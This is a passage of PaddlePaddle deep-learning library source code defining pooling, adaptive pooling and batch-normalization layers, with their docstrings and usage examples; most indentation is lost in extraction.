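            # channel-last "NHWC" layout described in Args above.
            data_nhwc = fluid.data(name='data_nhwc', shape=[None, 32, 32, 3], dtype='float32')
            out_3 = fluid.layers.pool2d(
                input = data_nhwc,
                pool_size = 3,
                pool_type = "max",
                pool_stride = 1,
                pool_padding = "SAME",
                data_format = "NHWC")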
"""
if pool_type not in ["max", "avg"]:
        raise ValueError(
            "Unknown Attr(pool_type): '%s'. It can only be 'max' or 'avg'." %
            str(pool_type))
if global_pooling is False and pool_size == -1:
raise ValueError(
"When Attr(global_pooling) is False, Attr(pool_size) must be passed "
"and be a valid value. Received pool_size: %s." % str(pool_size))
if not isinstance(use_cudnn, bool):
raise TypeError("Attr(use_cudnn) should be True or False. Received "
"Attr(use_cudnn): %s." % str(use_cudnn))
if data_format not in ["NCHW", "NHWC"]:
raise ValueError(
"Attr(data_format) should be 'NCHW' or 'NHWC'. Received "
"Attr(data_format): %s." % str(data_format))
pool_size = utils.convert_to_list(pool_size, 2, 'pool_size')
pool_stride = utils.convert_to_list(pool_stride, 2, 'pool_stride')
def update_padding(padding, data_format):
def is_list_or_tuple(ele):
if isinstance(ele, list) or isinstance(ele, tuple):
return True
return False
if is_list_or_tuple(padding) and len(padding) == 4:
if is_list_or_tuple(padding[0]) and (data_format == "NCHW"):
if not (padding[0] == [0, 0] and padding[1] == [0, 0]):
raise ValueError(
"Non-zero pool_padding(%s) in the batch or channel dimensions "
"is not supported." % str(padding))
padding = padding[2:4]
padding = [ele for a_list in padding for ele in a_list]
elif is_list_or_tuple(padding[0]) and (data_format == "NHWC"):
if not (padding[0] == [0, 0] and padding[3] == [0, 0]):
raise ValueError(
"Non-zero pool_padding(%s) in the batch or channel dimensions "
"is not supported." % str(padding))
padding = padding[1:3]
padding = [ele for a_list in padding for ele in a_list]
padding = utils.convert_to_list(padding, 4, 'padding')
if utils._is_symmetric_padding(padding, 2):
padding = [padding[0], padding[2]]
else:
padding = utils.convert_to_list(padding, 2, 'padding')
return padding
padding_algorithm = "EXPLICIT"
if isinstance(pool_padding, str):
pool_padding = pool_padding.upper()
if pool_padding not in ["SAME", "VALID"]:
raise ValueError(
"Unknown Attr(pool_padding): '%s'. It can only be 'SAME' or 'VALID'."
% str(pool_padding))
if pool_padding == "VALID":
padding_algorithm = "VALID"
pool_padding = [0, 0]
if ceil_mode != False:
raise ValueError(
"When Attr(pool_padding) is \"VALID\", Attr(ceil_mode) must be False. "
"Received ceil_mode: True.")
elif pool_padding == "SAME":
padding_algorithm = "SAME"
pool_padding = [0, 0]
pool_padding = update_padding(pool_padding, data_format)
op_type = 'pool2d'
helper = LayerHelper(op_type, **locals())
dtype = helper.input_dtype()
pool_out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type=op_type,
inputs={"X": input},
outputs={"Out": pool_out},
attrs={
"pooling_type": pool_type,
"ksize": pool_size,
"global_pooling": global_pooling,
"strides": pool_stride,
"paddings": pool_padding,
"padding_algorithm": padding_algorithm,
"use_cudnn": use_cudnn,
"ceil_mode": ceil_mode,
"use_mkldnn": False,
"exclusive": exclusive,
"data_format": data_format,
})
return pool_out
@templatedoc()
def pool3d(input,
pool_size=-1,
pool_type="max",
pool_stride=1,
pool_padding=0,
global_pooling=False,
use_cudnn=True,
ceil_mode=False,
name=None,
exclusive=True,
data_format="NCDHW"):
"""
${comment}
Args:
input (Variable): The input tensor of pooling operator, which is a 5-D tensor with
shape [N, C, D, H, W]. The format of
input tensor is `"NCDHW"` or `"NDHWC"`, where `N` is batch size, `C` is
the number of channels, `D` is the depth of the feature,
`H` is the height of the feature, and `W` is the width
of the feature.
pool_size (int|list|tuple): The pool kernel size. If pool kernel size
is a tuple or list, it must contain three integers,
(pool_size_Depth, pool_size_Height, pool_size_Width).
Otherwise, the pool kernel size will be the cube of an int.
pool_type (string): ${pooling_type_comment}
        pool_stride (int|list|tuple): The pool stride size. If pool stride size is a tuple or list,
            it must contain three integers, `[stride_Depth, stride_Height, stride_Width]`.
            Otherwise, the pool stride size will be a cube of an int.
        pool_padding (string|int|list|tuple): The pool padding size. If `pool_padding` is a string,
            either 'VALID' or 'SAME' which is the padding algorithm. If pool padding size is a tuple or list,
it could be in three forms: `[pad_depth, pad_height, pad_width]` or
`[pad_depth_front, pad_depth_back, pad_height_top, pad_height_bottom, pad_width_left, pad_width_right]`,
and when `data_format` is `"NCDHW"`, `pool_padding` can be in the form
`[[0,0], [0,0], [pad_depth_front, pad_depth_back], [pad_height_top, pad_height_bottom], [pad_width_left, pad_width_right]]`.
when `data_format` is `"NDHWC"`, `pool_padding` can be in the form
`[[0,0], [pad_depth_front, pad_depth_back], [pad_height_top, pad_height_bottom], [pad_width_left, pad_width_right], [0,0]]`.
global_pooling (bool): ${global_pooling_comment}
use_cudnn (bool): ${use_cudnn_comment}
ceil_mode (bool): ${ceil_mode_comment}
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
exclusive (bool): Whether to exclude padding points in average pooling
mode, default is true.
data_format (string): The data format of the input and output data. An optional string from: `"NCDHW"`, `"NDHWC"`.
The default is `"NCDHW"`. When it is `"NCDHW"`, the data is stored in the order of:
`[batch_size, input_channels, input_depth, input_height, input_width]`.
Returns:
Variable: The output tensor of pooling result. The data type is same as input tensor.
Raises:
ValueError: If `pool_type` is not "max" nor "avg".
ValueError: If `global_pooling` is False and `pool_size` is -1.
TypeError: If `use_cudnn` is not a bool value.
ValueError: If `data_format` is not "NCDHW" or "NDHWC".
ValueError: If `pool_padding` is a string, but not "SAME" or "VALID".
ValueError: If `pool_padding` is "VALID", but `ceil_mode` is True.
ValueError: If `pool_padding` is a list or tuple, but the elements in the batch or channel dimensions are non-zero.
ShapeError: If the input is not a 4-D or 5-D Tensor.
ShapeError: If the dimension of input minus the size of `pool_stride` is not 2.
ShapeError: If the size of `pool_size` and `pool_stride` is not equal.
ShapeError: If the output's shape calculated is not greater than 0.
Examples:
.. code-block:: python
import paddle.fluid as fluid
data = fluid.data(name='data', shape=[None, 3, 32, 32, 32], dtype='float32')
# max pool3d
pool3d = fluid.layers.pool3d(
input = data,
pool_size = 2,
pool_type = "max",
pool_stride = 1,
global_pooling=False)
# average pool3d
pool3d = fluid.layers.pool3d(
input = data,
pool_size = 2,
pool_type = "avg",
pool_stride = 1,
global_pooling=False)
# global average pool3d
pool3d = fluid.layers.pool3d(
input = data,
pool_size = 2,
pool_type = "avg",
pool_stride = 1,
global_pooling=True)
# example 1:
# Attr(pool_padding) is a list with 6 elements, Attr(data_format) is "NCDHW".
out_1 = fluid.layers.pool3d(
input = data,
pool_size = 2,
pool_type = "avg",
pool_stride = 1,
pool_padding = [1, 2, 1, 0, 1, 2],
global_pooling = False,
data_format = "NCDHW")
# example 2:
# Attr(pool_padding) is a string, Attr(data_format) is "NCDHW".
out_2 = fluid.layers.pool3d(
input = data,
pool_size = 3,
pool_type = "avg",
pool_stride = 1,
pool_padding = "VALID",
global_pooling = False,
data_format = "NCDHW")
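            # example 3 (a hedged sketch, shapes are illustrative):
            # Attr(data_format) is "NDHWC", i.e. the channel-last layout.
            data_ndhwc = fluid.data(
                name='data_ndhwc', shape=[None, 32, 32, 32, 3], dtype='float32')
            out_3 = fluid.layers.pool3d(
                input = data_ndhwc,
                pool_size = 2,
                pool_type = "max",
                pool_stride = 1,
                data_format = "NDHWC")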
"""
if pool_type not in ["max", "avg"]:
        raise ValueError(
            "Unknown Attr(pool_type): '%s'. It can only be 'max' or 'avg'." %
            str(pool_type))
if global_pooling is False and pool_size == -1:
raise ValueError(
"When Attr(global_pooling) is False, Attr(pool_size) must be passed "
"and be a valid value. Received Attr(pool_size): %s." %
str(pool_size))
if not isinstance(use_cudnn, bool):
raise TypeError("Attr(use_cudnn) should be True or False. Received "
"Attr(use_cudnn): %s. " % str(use_cudnn))
if data_format not in ["NCDHW", "NDHWC"]:
raise ValueError(
"Attr(data_format) should be 'NCDHW' or 'NDHWC'. Received "
"Attr(data_format): %s" % str(data_format))
pool_size = utils.convert_to_list(pool_size, 3, 'pool_size')
pool_stride = utils.convert_to_list(pool_stride, 3, 'pool_stride')
def update_padding(padding, data_format):
def is_list_or_tuple(ele):
if isinstance(ele, (list, tuple)):
return True
return False
if is_list_or_tuple(padding) and len(padding) == 5:
if is_list_or_tuple(padding[0]) and (data_format == "NCDHW"):
if not (padding[0] == [0, 0] and padding[1] == [0, 0]):
raise ValueError(
"Non-zero pool_padding(%s) in the batch or channel dimensions "
"is not supported." % str(padding))
padding = padding[2:5]
padding = [ele for a_list in padding for ele in a_list]
elif is_list_or_tuple(padding[0]) and (data_format == "NDHWC"):
if not (padding[0] == [0, 0] and padding[4] == [0, 0]):
raise ValueError(
"Non-zero pool_padding(%s) in the batch or channel dimensions "
"is not supported." % str(padding))
padding = padding[1:4]
padding = [ele for a_list in padding for ele in a_list]
padding = utils.convert_to_list(padding, 6, 'padding')
if utils._is_symmetric_padding(padding, 3):
padding = [padding[0], padding[2], padding[4]]
elif is_list_or_tuple(padding) and len(padding) == 6:
padding = utils.convert_to_list(padding, 6, 'padding')
if utils._is_symmetric_padding(padding, 3):
padding = [padding[0], padding[2], padding[4]]
else:
padding = utils.convert_to_list(padding, 3, 'padding')
return padding
padding_algorithm = "EXPLICIT"
if isinstance(pool_padding, str):
pool_padding = pool_padding.upper()
if pool_padding not in ["SAME", "VALID"]:
raise ValueError(
"Unknown Attr(pool_padding): '%s'. It can only be 'SAME' or 'VALID'."
% str(pool_padding))
if pool_padding == "VALID":
padding_algorithm = "VALID"
pool_padding = [0, 0, 0]
if ceil_mode != False:
raise ValueError(
"When Attr(pool_padding) is \"VALID\", ceil_mode must be False. "
"Received ceil_mode: True.")
elif pool_padding == "SAME":
padding_algorithm = "SAME"
pool_padding = [0, 0, 0]
pool_padding = update_padding(pool_padding, data_format)
op_type = "pool3d"
helper = LayerHelper(op_type, **locals())
dtype = helper.input_dtype()
pool_out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type=op_type,
inputs={"X": input},
outputs={"Out": pool_out},
attrs={
"pooling_type": pool_type,
"ksize": pool_size,
"global_pooling": global_pooling,
"strides": pool_stride,
"paddings": pool_padding,
"padding_algorithm": padding_algorithm,
"use_cudnn": use_cudnn,
"ceil_mode": ceil_mode,
"use_mkldnn": False,
"exclusive": exclusive,
"data_format": data_format,
})
return pool_out
@templatedoc(op_type="pool2d")
def adaptive_pool2d(input,
pool_size,
pool_type="max",
require_index=False,
name=None):
"""
This operation calculates the output based on the input, pool_size,
pool_type parameters. Input(X) and output(Out) are in NCHW format, where N is batch
size, C is the number of channels, H is the height of the feature, and W is
the width of the feature. Parameters(pool_size) should contain two elements which
represent height and width, respectively. Also the H and W dimensions of output(Out)
    is the same as Parameter(pool_size). The output tensor shape will be [N, C, pool_size[0], pool_size[1]].
For average adaptive pool2d:
.. math::
hstart &= floor(i * H_{in} / H_{out})
hend &= ceil((i + 1) * H_{in} / H_{out})
wstart &= floor(j * W_{in} / W_{out})
wend &= ceil((j + 1) * W_{in} / W_{out})
Output(i ,j) &= \\frac{sum(Input[hstart:hend, wstart:wend])}{(hend - hstart) * (wend - wstart)}
Args:
input (Variable): The input tensor of pooling operator, which is a 4-D tensor
with shape [N, C, H, W]. The format of input tensor is NCHW,
where N is batch size, C is the number of channels, H is the
height of the feature, and W is the width of the feature.
The data type is float32 or float64.
pool_size (int|list|tuple): The pool kernel size. If pool kernel size is a tuple or list,
it must contain two integers, (pool_size_Height, pool_size_Width).
pool_type: ${pooling_type_comment}
require_index (bool): If true, the index of max pooling point will be returned along
with outputs. It cannot be set in average pooling type. Default False.
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
Returns:
Variable: The output tensor of adaptive pooling result. The data type is same
as input tensor.
Raises:
ValueError: 'pool_type' is not 'max' nor 'avg'.
ValueError: invalid setting 'require_index' true when 'pool_type' is 'avg'.
ValueError: 'pool_size' should be a list or tuple with length as 2.
Examples:
.. code-block:: python
# average adaptive pool2d
# suppose input data in shape of [N, C, H, W], `pool_size` is [m, n],
# output shape is [N, C, m, n], adaptive pool divide H and W dimensions
# of input data into m * n grids averagely and performs poolings in each
# grid to get output.
# adaptive average pool performs calculations as follow:
#
# for i in range(m):
# for j in range(n):
# hstart = floor(i * H / m)
# hend = ceil((i + 1) * H / m)
# wstart = floor(i * W / n)
# wend = ceil((i + 1) * W / n)
# output[:, :, i, j] = avg(input[:, :, hstart: hend, wstart: wend])
#
import paddle.fluid as fluid
data = fluid.data(name='data', shape=[None, 3, 32, 32], dtype='float32')
pool_out = fluid.layers.adaptive_pool2d(
input=data,
pool_size=[3, 3],
pool_type='avg')
# max adaptive pool2d
# suppose input data in shape of [N, C, H, W], `pool_size` is [m, n],
# output shape is [N, C, m, n], adaptive pool divide H and W dimensions
# of input data into m * n grids averagely and performs poolings in each
# grid to get output.
            # adaptive max pool performs calculations as follow:
#
# for i in range(m):
# for j in range(n):
# hstart = floor(i * H / m)
# hend = ceil((i + 1) * H / m)
# wstart = floor(i * W / n)
# wend = ceil((i + 1) * W / n)
# output[:, :, i, j] = max(input[:, :, hstart: hend, wstart: wend])
#
import paddle.fluid as fluid
data = fluid.data(name='data', shape=[None, 3, 32, 32], dtype='float32')
pool_out = fluid.layers.adaptive_pool2d(
input=data,
pool_size=[3, 3],
pool_type='max')
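            # A minimal sketch of require_index (illustrative): with max pooling the
            # layer can also return the index (mask) of each max value as a tuple.
            pool_out, mask = fluid.layers.adaptive_pool2d(
                input=data,
                pool_size=[3, 3],
                pool_type='max',
                require_index=True)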
"""
check_variable_and_dtype(
input, 'input', ['float16', 'float32', 'float64', 'int32', 'int64'],
'adaptive_pool2d')
check_type(pool_type, 'pool_type', str, 'adaptive_pool2d')
check_type(pool_size, 'pool_size', (int, list, tuple), 'adaptive_pool2d')
check_type(require_index, 'require_index', bool, 'adaptive_pool2d')
if pool_type not in ["max", "avg"]:
        raise ValueError(
            "Unknown pool_type: '%s'. It can only be 'max' or 'avg'." %
            str(pool_type))
if pool_type == "avg" and require_index:
raise ValueError(
"invalid setting 'require_index' true when 'pool_type' is 'avg'.")
pool_size = utils.convert_to_list(pool_size, 2, 'pool_size')
if pool_type == "max":
l_type = 'max_pool2d_with_index'
else:
l_type = "pool2d"
helper = LayerHelper(l_type, **locals())
dtype = helper.input_dtype()
pool_out = helper.create_variable_for_type_inference(dtype)
outputs = {"Out": pool_out}
if pool_type == "max":
mask = helper.create_variable_for_type_inference(dtype)
outputs["Mask"] = mask
helper.append_op(
type=l_type,
inputs={"X": input},
outputs=outputs,
attrs={
"pooling_type": pool_type,
"ksize": pool_size,
"adaptive": True,
})
return (pool_out, mask) if require_index else pool_out
@templatedoc(op_type="pool3d")
def adaptive_pool3d(input,
pool_size,
pool_type="max",
require_index=False,
name=None):
"""
This operation calculates the output based on the input, pool_size,
pool_type parameters. Input(X) and output(Out) are in NCDHW format, where N is batch
size, C is the number of channels, D is the depth of the feature, H is the height of
the feature, and W is the width of the feature. Parameters(pool_size) should contain
    three elements which represent depth, height and width, respectively. Also the D, H and W
    dimensions of output(Out) are the same as Parameter(pool_size). The output tensor shape
will be [N, C, pool_size[0], pool_size[1], pool_size[2]]
For average adaptive pool3d:
.. math::
dstart &= floor(i * D_{in} / D_{out})
dend &= ceil((i + 1) * D_{in} / D_{out})
hstart &= floor(j * H_{in} / H_{out})
hend &= ceil((j + 1) * H_{in} / H_{out})
wstart &= floor(k * W_{in} / W_{out})
wend &= ceil((k + 1) * W_{in} / W_{out})
Output(i ,j, k) &= \\frac{sum(Input[dstart:dend, hstart:hend, wstart:wend])}{(dend - dstart) * (hend - hstart) * (wend - wstart)}
Args:
input (Variable): The input tensor of pooling operator, which is a 5-D tensor with
shape [N, C, D, H, W]. The format of input tensor is NCDHW, where
N is batch size, C is the number of channels, D is the depth of the feature,
H is the height of the feature, and W is the width of the feature.
The data type is float32 or float64.
pool_size (int|list|tuple): The pool kernel size. If pool kernel size is a tuple or list,
it must contain three integers, (Depth, Height, Width).
pool_type: ${pooling_type_comment}
require_index (bool): If true, the index of max pooling point will be returned along
with outputs. It cannot be set in average pooling type. Default False.
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
Returns:
Variable: The output tensor of adaptive pooling result. The data type is same as input tensor.
Raises:
ValueError: 'pool_type' is not 'max' nor 'avg'.
ValueError: invalid setting 'require_index' true when 'pool_type' is 'avg'.
        ValueError: 'pool_size' should be a list or tuple with length as 3.
Examples:
.. code-block:: python
# average adaptive pool3d
# suppose input data in shape of [N, C, D, H, W], `pool_size` is [l, m, n],
# output shape is [N, C, l, m, n], adaptive pool divide D, H and W dimensions
# of input data into l * m * n grids averagely and performs poolings in each
# grid to get output.
# adaptive average pool performs calculations as follow:
#
# for i in range(l):
# for j in range(m):
# for k in range(n):
# dstart = floor(i * D / l)
# dend = ceil((i + 1) * D / l)
# hstart = floor(j * H / m)
# hend = ceil((j + 1) * H / m)
# wstart = floor(k * W / n)
# wend = ceil((k + 1) * W / n)
# output[:, :, i, j, k] =
# avg(input[:, :, dstart:dend, hstart: hend, wstart: wend])
#
import paddle.fluid as fluid
data = fluid.data(
name='data', shape=[None, 3, 32, 32, 32], dtype='float32')
pool_out = fluid.layers.adaptive_pool3d(
input=data,
pool_size=[3, 3, 3],
pool_type='avg')
# max adaptive pool3d
# suppose input data in shape of [N, C, D, H, W], `pool_size` is [l, m, n],
# output shape is [N, C, l, m, n], adaptive pool divide D, H and W dimensions
# of input data into l * m * n grids averagely and performs poolings in each
# grid to get output.
            # adaptive max pool performs calculations as follow:
#
# for i in range(l):
# for j in range(m):
# for k in range(n):
# dstart = floor(i * D / l)
# dend = ceil((i + 1) * D / l)
# hstart = floor(j * H / m)
# hend = ceil((j + 1) * H / m)
# wstart = floor(k * W / n)
# wend = ceil((k + 1) * W / n)
# output[:, :, i, j, k] =
            #                     max(input[:, :, dstart:dend, hstart: hend, wstart: wend])
#
import paddle.fluid as fluid
data = fluid.data(
name='data', shape=[None, 3, 32, 32, 32], dtype='float32')
pool_out = fluid.layers.adaptive_pool3d(
input=data,
pool_size=[3, 3, 3],
pool_type='max')
"""
check_variable_and_dtype(
input, 'input', ['float16', 'float32', 'float64', 'int32', 'int64'],
'adaptive_pool3d')
check_type(pool_type, 'pool_type', str, 'adaptive_pool3d')
check_type(pool_size, 'pool_size', (int, list, tuple), 'adaptive_pool3d')
check_type(require_index, 'require_index', bool, 'adaptive_pool3d')
if pool_type not in ["max", "avg"]:
        raise ValueError(
            "Unknown pool_type: '%s'. It can only be 'max' or 'avg'." %
            str(pool_type))
if pool_type == "avg" and require_index:
raise ValueError(
"invalid setting 'require_index' true when 'pool_type' is 'avg'.")
pool_size = utils.convert_to_list(pool_size, 3, 'pool_size')
if pool_type == "max":
l_type = 'max_pool3d_with_index'
else:
l_type = "pool3d"
helper = LayerHelper(l_type, **locals())
dtype = helper.input_dtype()
pool_out = helper.create_variable_for_type_inference(dtype)
outputs = {"Out": pool_out}
if pool_type == "max":
mask = helper.create_variable_for_type_inference(dtype)
outputs["Mask"] = mask
helper.append_op(
type=l_type,
inputs={"X": input},
outputs=outputs,
attrs={
"pooling_type": pool_type,
"ksize": pool_size,
"adaptive": True,
})
return (pool_out, mask) if require_index else pool_out
def batch_norm(input,
act=None,
is_test=False,
momentum=0.9,
epsilon=1e-05,
param_attr=None,
bias_attr=None,
data_layout='NCHW',
in_place=False,
name=None,
moving_mean_name=None,
moving_variance_name=None,
do_model_average_for_mean_and_var=True,
use_global_stats=False):
"""
**Batch Normalization Layer**
Can be used as a normalizer function for convolution or fully_connected operations.
The required data format for this layer is one of the following:
1. NHWC `[batch, in_height, in_width, in_channels]`
2. NCHW `[batch, in_channels, in_height, in_width]`
Refer to `Batch Normalization: Accelerating Deep Network Training by Reducing
Internal Covariate Shift <https://arxiv.org/pdf/1502.03167.pdf>`_
for more details.
:math:`input` is the input features over a mini-batch.
.. math::
\\mu_{\\beta} &\\gets \\frac{1}{m} \\sum_{i=1}^{m} x_i \\qquad &//\\
\ mini-batch\ mean \\\\
\\sigma_{\\beta}^{2} &\\gets \\frac{1}{m} \\sum_{i=1}^{m}(x_i - \\
\\mu_{\\beta})^2 \\qquad &//\ mini-batch\ variance \\\\
\\hat{x_i} &\\gets \\frac{x_i - \\mu_\\beta} {\\sqrt{\\
\\sigma_{\\beta}^{2} + \\epsilon}} \\qquad &//\ normalize \\\\
y_i &\\gets \\gamma \\hat{x_i} + \\beta \\qquad &//\ scale\ and\ shift
moving\_mean = moving\_mean * momentum + mini-batch\_mean * (1. - momentum) \\\\
moving\_var = moving\_var * momentum + mini-batch\_var * (1. - momentum)
moving_mean is global mean and moving_var is global variance.
When use_global_stats = True, the :math:`\\mu_{\\beta}`
and :math:`\\sigma_{\\beta}^{2}` are not the statistics of one mini-batch.
    They are global (or running) statistics, usually obtained from a
    pre-trained model.
The training and testing (or inference) have the same behavior:
.. math::
\\hat{x_i} &\\gets \\frac{x_i - \\mu_\\beta} {\\sqrt{\\
\\sigma_{\\beta}^{2} + \\epsilon}} \\\\
y_i &\\gets \\gamma \\hat{x_i} + \\beta
Note:
if build_strategy.sync_batch_norm=True, the batch_norm in network will use
sync_batch_norm automatically.
        `is_test = True` can only be used in test or inference programs; `is_test` CANNOT be set to True in a train program. If you want to use the global statistics from a pre-trained model in a train program, please set `use_global_stats = True`.
Args:
input(Variable): The rank of input variable can be 2, 3, 4, 5. The data type
is float16 or float32 or float64.
act(string, Default None): Activation type, linear|relu|prelu|...
is_test (bool, Default False): A flag indicating whether it is in
            test phase or not.
momentum(float|Variable, Default 0.9): The value used for the moving_mean and
moving_var computation. This should be a float number or a Variable with
shape [1] and data type as float32. The updated formula is:
:math:`moving\_mean = moving\_mean * momentum + new\_mean * (1. - momentum)`
:math:`moving\_var = moving\_var * momentum + new\_var * (1. - momentum)`
Default is 0.9.
epsilon(float, Default 1e-05): A value added to the denominator for
numerical stability. Default is 1e-5.
param_attr(ParamAttr|None): The parameter attribute for Parameter `scale`
of batch_norm. If it is set to None or one attribute of ParamAttr, batch_norm
will create ParamAttr as param_attr, the name of scale can be set in ParamAttr.
If the Initializer of the param_attr is not set, the parameter is initialized
with Xavier. Default: None.
bias_attr(ParamAttr|None): The parameter attribute for the bias of batch_norm.
If it is set to None or one attribute of ParamAttr, batch_norm
will create ParamAttr as bias_attr, the name of bias can be set in ParamAttr.
If the Initializer of the bias_attr is not set, the bias is initialized zero.
Default: None.
data_layout (str, optional): Specify the data format of the input, and the data format of the output
will be consistent with that of the input. An optional string from: `"NCHW"`, `"NHWC"`.
The default is `"NCHW"`. When it is `"NCHW"`, the data is stored in the order of:
`[batch_size, input_channels, input_height, input_width]`.
in_place(bool, Default False): Make the input and output of batch norm reuse memory.
name(str|None): For detailed information, please refer to :ref:`api_guide_Name`.
Usually name is no need to set and None by default.
moving_mean_name(str, Default None): The name of moving_mean which store the global Mean. If it
is set to None, batch_norm will save global mean with a random name, otherwise, batch_norm
will save global mean with the string.
moving_variance_name(str, Default None): The name of the moving_variance which store the global Variance.
If it is set to None, batch_norm will save global variance with a random name, otherwise, batch_norm
will save global variance with the string.
do_model_average_for_mean_and_var(bool, Default True): Whether parameter mean and variance should do model
average when model average is enabled.
use_global_stats(bool, Default False): Whether to use global mean and
variance. In inference or test mode, set use_global_stats to true
or is_test to true, and the behavior is equivalent.
In train mode, when setting use_global_stats True, the global mean
and variance are also used during train period.
Returns:
A Variable holding Tensor which is the result after applying batch normalization on the input,
has same shape and data type with input.
Examples:
.. code-block:: python
import paddle.fluid as fluid
x = fluid.data(name='x', shape=[3, 7, 3, 7], dtype='float32')
hidden1 = fluid.layers.fc(input=x, size=200, param_attr='fc1.w')
hidden2 = fluid.layers.batch_norm(input=hidden1)
.. code-block:: python
# batch_norm with momentum as Variable
import paddle.fluid as fluid
import paddle.fluid.layers.learning_rate_scheduler as lr_scheduler
def get_decay_momentum(momentum_init, decay_steps, decay_rate):
global_step = lr_scheduler._decay_step_counter()
momentum = fluid.layers.create_global_var(
shape=[1],
value=float(momentum_init),
dtype='float32',
# set persistable for save checkpoints and resume
persistable=True,
name="momentum")
div_res = global_step / decay_steps
decayed_momentum = momentum_init * (decay_rate**div_res)
fluid.layers.assign(decayed_momentum, momentum)
return momentum
x = fluid.data(name='x', shape=[3, 7, 3, 7], dtype='float32')
hidden1 = fluid.layers.fc(input=x, size=200, param_attr='fc1.w')
momentum = get_decay_momentum(0.9, 1e5, 0.9)
hidden2 = fluid.layers.batch_norm(input=hidden1, momentum=momentum)
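        A further minimal sketch (illustrative): inference-style normalization that
        relies on the global (running) statistics instead of mini-batch statistics.
        .. code-block:: python
            import paddle.fluid as fluid
            x = fluid.data(name='x', shape=[3, 7, 3, 7], dtype='float32')
            hidden1 = fluid.layers.fc(input=x, size=200, param_attr='fc1.w')
            hidden2 = fluid.layers.batch_norm(
                input=hidden1, is_test=True, use_global_stats=True)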
"""
assert bias_attr is not False, "bias_attr should not be False in batch_norm."
helper = LayerHelper('batch_norm', **locals())
check_variable_and_dtype(input, 'input', ['float16', 'float32', 'float64'],
'batch_norm')
dtype = helper.input_dtype()
has_reserve_space = False
if data_layout == 'NHWC':
flag = os.environ.get('FLAGS_cudnn_batchnorm_spatial_persistent')
if flag is not None and flag.lower() in ['true', '1']:
has_reserve_space = True
# use fp32 for bn parameter
if dtype == core.VarDesc.VarType.FP16:
dtype = core.VarDesc.VarType.FP32
input_shape = input.shape
if data_layout == 'NCHW':
channel_num = input_shape[1]
else:
if data_layout == 'NHWC':
channel_num = input_shape[-1]
else:
raise ValueError("unsupported data layout:" + data_layout)
param_shape = [channel_num]
# create parameter
scale = helper.create_parameter(
attr=helper.param_attr,
shape=param_shape,
dtype=dtype,
default_initializer=Constant(1.0))
bias = helper.create_parameter(
attr=helper.bias_attr, shape=param_shape, dtype=dtype, is_bias=True)
mean = helper.create_parameter(
attr=ParamAttr(
name=moving_mean_name,
initializer=Constant(0.0),
trainable=False,
do_model_average=do_model_average_for_mean_and_var),
shape=param_shape,
dtype=dtype)
mean.stop_gradient = True
variance = helper.create_parameter(
attr=ParamAttr(
name=moving_variance_name,
initializer=Constant(1.0),
trainable=False,
do_model_average=do_model_average_for_mean_and_var),
shape=param_shape,
dtype=dtype)
variance.stop_gradient = True
# create output
# mean and mean_out share the same memory
mean_out = mean
# variance and variance out share the same memory
variance_out = variance
saved_mean = helper.create_variable_for_type_inference(
dtype=dtype, stop_gradient=True)
saved_variance = helper.create_variable_for_type_inference(
dtype=dtype, stop_gradient=True)
reserve_space = None
if has_reserve_space:
reserve_space = helper.create_variable_for_type_inference(
dtype=core.VarDesc.VarType.FP16, stop_gradient=True)
batch_norm_out = input if in_place else \
helper.create_variable_for_type_inference(dtype)
inputs = {
"X": input,
"Scale": scale,
"Bias": bias,
"Mean": mean,
"Variance": variance
}
attrs = {
"epsilon": epsilon,
"is_test": is_test,
"data_layout": data_layout,
"use_mkldnn": False,
"fuse_with_relu": False,
"use_global_stats": use_global_stats
}
if isinstance(momentum, Variable):
inputs['MomemtumTensor'] = momentum
else:
attrs['momentum'] = momentum
outputs = {
"Y": batch_norm_out,
"MeanOut": mean_out,
"VarianceOut": variance_out,
"SavedMean": saved_mean,
"SavedVariance": saved_variance
}
if reserve_space is not None:
outputs["ReserveSpace"] = reserve_space
helper.append_op(
type="batch_norm", inputs=inputs, outputs=outputs, attrs=attrs)
return helper.append_activation(batch_norm_out)
def inplace_abn(input,
act=None,
is_test=False,
momentum=0.9,
epsilon=1e-05,
param_attr=None,
bias_attr=None,
data_layout='NCHW',
name=None,
moving_mean_name=None,
moving_variance_name=None,
do_model_average_for_mean_and_var=True,
use_global_stats=False,
act_alpha=1.0):
"""
**In-place Activation Batch Normalization Layer**
This layer calculates batch normalization and activation with in-place memory.
For batch normalization calculations, see `fluid.layers.batch_norm`.
For in-place activation batch normalization, see `In-Place Activated BatchNorm for
Memory-Optimized Training of DNNs <https://arxiv.org/abs/1712.02616>`_
`inplace_abn` only support activation type as `None`, `identity`, `leaky_relu`,
`elu` currently.
`inplace_abn` only support data type as `float32`, `float64` currently.
Note:
if build_strategy.sync_batch_norm=True, the batch_norm in network will use
sync_batch_norm automatically.
        `is_test = True` can only be used in test or inference programs; `is_test` CANNOT be set to True in a train program. If you want to use the global statistics from a pre-trained model in a train program, please set `use_global_stats = True`.
Args:
input(Variable): The rank of input variable can be 2, 3, 4, 5. The data type
            is float32 or float64.
act(string, Default None): Activation type, linear|relu|prelu|...
is_test (bool, Default False): A flag indicating whether it is in
            test phase or not.
momentum(float|Variable, Default 0.9): The value used for the moving_mean and
moving_var computation. This should be a float number or a Variable with
shape [1] and data type as float32. The updated formula is:
:math:`moving\_mean = moving\_mean * momentum + new\_mean * (1. - momentum)`
:math:`moving\_var = moving\_var * momentum + new\_var * (1. - momentum)`
Default is 0.9.
epsilon(float, Default 1e-05): A value added to the denominator for
numerical stability. Default is 1e-5.
param_attr(ParamAttr|None): The parameter attribute for Parameter `scale`
of inplace_abn. If it is set to None or one attribute of ParamAttr, inplace_abn
will create ParamAttr as param_attr, the name of scale can be set in ParamAttr.
If the Initializer of the param_attr is not set, the parameter is initialized
with Xavier. Default: None.
bias_attr(ParamAttr|None): The parameter attribute for the bias of inplace_abn.
If it is set to None or one attribute of ParamAttr, inplace_abn
will create ParamAttr as bias_attr, the name of bias can be set in ParamAttr.
If the Initializer of the bias_attr is not set, the bias is initialized zero.
Default: None.
data_layout (str, optional): Specify the data format of the input, and the data format of the output
will be consistent with that of the input. An optional string from: `"NCHW"`, `"NHWC"`.
The default is `"NCHW"`. When it is `"NCHW"`, the data is stored in the order of:
`[batch_size, input_channels, input_height, input_width]`.
